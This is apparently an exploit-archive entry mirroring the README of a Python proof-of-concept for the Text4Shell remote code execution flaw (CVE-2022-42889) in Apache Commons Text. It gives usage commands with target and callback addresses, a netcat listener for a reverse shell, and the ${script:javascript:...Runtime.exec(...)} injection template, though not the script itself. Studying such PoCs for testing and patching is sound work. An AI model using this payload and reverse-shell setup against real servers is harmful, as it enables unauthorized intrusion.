来源

关联漏洞

描述

A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10.

介绍

# text4shell-exploit
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10.
This exploit targets vulnerable Java applications that use the `StringSubstitutor` class with interpolation enabled, allowing injection of `${script:...}` expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the `data` query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

 **Disclaimer**: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.

##  Description
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as **Text4Shell** (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by `StringSubstitutor`.

Tested against:
- Apache Commons Text < 1.10.0
- Java applications using `${script:...}` interpolation from untrusted input

##  Usage

```bash
python3 text4shell.py <target_ip> <callback_ip> <callback_port>
```

## Example 
```bash
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
```

## Make sure to set up a lsitener on your attacking machine: 
```bash
nc -nlvp 4444
```

## Payload Logic
The script injects:
```bash
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
```
The reverse shell is sent via `/data` parameter using a POST request.

文件快照

 [4.0K]  /data/pocs/027ed40a4f2a44216e3ad5389243906afb1d37cf
├── [1.0K]  LICENSE
├── [1.6K]  README.md
└── [1.2K]  text4shell.py

0 directories, 3 files

备注